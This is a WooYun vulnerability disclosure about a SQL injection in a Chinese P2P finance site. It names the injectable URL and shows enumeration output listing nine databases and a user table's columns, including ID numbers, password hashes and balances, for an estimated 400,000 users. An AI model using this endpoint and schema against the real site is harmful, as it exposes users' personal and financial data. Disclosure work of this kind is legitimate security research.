当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0192025

漏洞标题:P2P安全之华人金融某处严重安全缺陷涉及四十万用户敏感信息

相关厂商:华人金融

漏洞作者: Exploit DB

提交时间:2016-04-06 11:22

修复时间:2016-05-21 11:30

公开时间:2016-05-21 11:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT.

详细说明:

http://wap.5262.com/index/notice?action=list&mstatus=1


QQ截图20160402010630.png


available databases [9]:
[*] accounts_data
[*] billstable_data
[*] borrow_data
[*] gome_data
[*] log_data
[*] members_data
[*] order_data
[*] queue_data
[*] test


Database: members_data
Table: data_users
[53 columns]
+------------------+-----------------------+
| Column           | Type                  |
+------------------+-----------------------+
| agent_reg        | tinyint(1)            |
| auth_time        | int(10)               |
| becomeManageTime | int(11)               |
| bmz              | varchar(10)           |
| bumeng           | varchar(8)            |
| city             | varchar(20)           |
| email            | varchar(30)           |
| freezeMoney      | varchar(60)           |
| from_weixin      | char(6)               |
| fundStatus       | tinyint(1)            |
| hash             | varchar(32)           |
| IDcardNo         | varchar(30)           |
| imei             | varchar(50)           |
| income           | float(11,2)           |
| is_legal         | tinyint(1)            |
| isEmail          | tinyint(1)            |
| isexport         | tinyint(1)            |
| isgree           | tinyint(1)            |
| isLock           | tinyint(2)            |
| isManages        | tinyint(2)            |
| isMobile         | tinyint(1)            |
| ismzf            | tinyint(4)            |
| isPass           | tinyint(1)            |
| jgid             | int(11)               |
| lastloginDate    | int(11)               |
| loginNum         | int(11)               |
| manageDate       | int(11)               |
| mobile           | varchar(11)           |
| money            | float(11,2)           |
| moneyLock        | tinyint(2)            |
| myGroupID        | varchar(20)           |
| myIntoID         | int(11)               |
| myManageID       | int(11)               |
| myMoney          | varchar(100)          |
| passWord         | varchar(32)           |
| payPassWord      | varchar(32)           |
| platform         | int(11)               |
| preloginDate     | int(11)               |
| prov             | varchar(20)           |
| qrimage          | varchar(200)          |
| rank             | tinyint(2)            |
| realName         | varchar(30)           |
| regip            | varchar(50)           |
| regTime          | int(11)               |
| sourceId         | varchar(100)          |
| terminal         | tinyint(4)            |
| topRecommend     | int(11)               |
| userform         | tinyint(1)            |
| userid           | int(11)               |
| userName         | varchar(30)           |
| userSource       | varchar(30)           |
| userType         | enum('1','2','3','4') |
| weixin_uid       | varchar(32)           |
+------------------+-----------------------+


40W用户敏感信息泄露

QQ截图20160402010630.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 Exploit DB@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

评价